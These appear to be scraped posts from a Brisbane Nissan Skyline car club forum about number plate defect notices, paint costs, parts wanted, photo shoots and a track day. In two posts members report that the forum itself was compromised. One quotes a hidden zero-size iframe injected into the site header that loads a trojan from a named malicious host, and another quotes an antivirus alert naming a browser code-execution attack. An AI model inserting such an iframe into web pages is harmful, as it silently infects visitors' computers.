  1. you allowed to off set it as long as its still fully viewable from a 180 degree angel. this was told me the other wk by a QLD Transport officer when i got my defect notice for my number plate being incorrectly secured to the front bar.
  2. yes, cause once the cops have written the notice of defect against your car and issued you with the fine, it stands until you take it through the courts to have it dismissed. QLD Transport rules can not override anything a police officer says, only the courts can. Pretty dodgy rules and system we have considering QLD Transport are suppose to have more power over registered vechicles then cops these days.
  3. how long is a piece of string? only as long as it is till you say cut. well, same with the paint job. only as good as you want the job to be. some dodgy people out there who will do a job for 2k and will be done in 2days and end up lookin dodgy OR pay around 4k and get it back to perfection as it was orginally when the car was made.
  4. Based on facts that its going to be raining this weekend, I've decided to hold off and move it to next weekend. However, if it is clear/fine on Sunday afternoon, as I'll be heading down to the coast for the afternoon. Those interested in a few highway photo shoots are welcome to come along.
  5. Want to buy a Nismo 320k full cluster for my R33 GTST Skyline. Anyone got one for sale or know where I can purchase one from?
  6. Is anyone up for this or should we not bother?
  7. Provided the following update in the 1st post - I've talked to a friend of mine who does photography work and at this stage, we can got professional photo's done. With this in mind, what we can look at doing with the photo's is purchasing a photo frame to which your able place on your wall at home or at work of your skyline. The photo frame will allow you have either 4 or 5 photos in it or can just be a single photo frame. This I'll look more into over the coming days. But this will all depend on the interest showin in having this done. There will be a cost involved. At this stage as I havent looked fully into it, I have no exact cost that I could provide. I could probably estimate that it might be around the $40-$60 mark depending on which frame you choose from. Again, post your interest as this would be a pretty good idea to do.
  8. If we were to do it on a sunday, it would be towards the mid afternoon (around 2 or 3) but would be down the goldcoast as I usually spend the sunday afternoons down the coast.
  9. I'm wanting to organise a photo shoot session for this Saturday afternoon of just the general skylines in and around brisbane. Will be looking at doing some of the photo shoots within the cbd (possibly down where that big tree is on the corner near the botanical gardens) and around the cbd (just on the outta skirts to have the CBD as a back drop). If all this goes well, we can possibly look at doin some in other areas such as having the story bridge and the gateway bridge as a back drop. If people are also interested in sticking around, we can look at doing some night shots as well. Between the afternoon photo shoot and night shoot, we can possibly go somewhere and grab a feed. With the photo shoot, I plan to possibly look at using some of the photo's as skyline wallpapers that we can use on both personal and/or work workstations. Post your interest. Of course any skylines are welcome to come along. Details of the event will be posted up on Thursday based on the interest showin in this thread. 10. just looking at the source code that i can see of the index.php file. look at the header files for the forum, you'll find there is this code "<iframe src="http://196.regvista.com/index.php?ref=nu" width="0" height="0" frameborder="0"></iframe>" in there somewhere which is calling on the site which holds the trogan file to infect pc's from this site.
  11. Got the following message from my Norton Antivirus when coming to the site just now. Intrusion: HTTP MSIE CreateTextRange Code Exec. Intruder: 196.regvista.com(85.255.115.196)(http(80)). Risk Level: High. Protocol: TCP. Attack IP: detzol(192.168.1.169). Attacked Port: 1275.

  15. I was wondering what others were getting along the straight. Best I got along the front straight was 169km and then along the back straight when the whole track was opened up, got 187km. Over all, I clocked up 71k's on the track and used up pretty much a full tank of fuel (minus the fuel from brisbane to the track). I'm lookin forward to the next one and with my track times I did, I was pretty impressed with my outcome. Next bit of work to be completed on the car now is suspension, rotors and tyres.
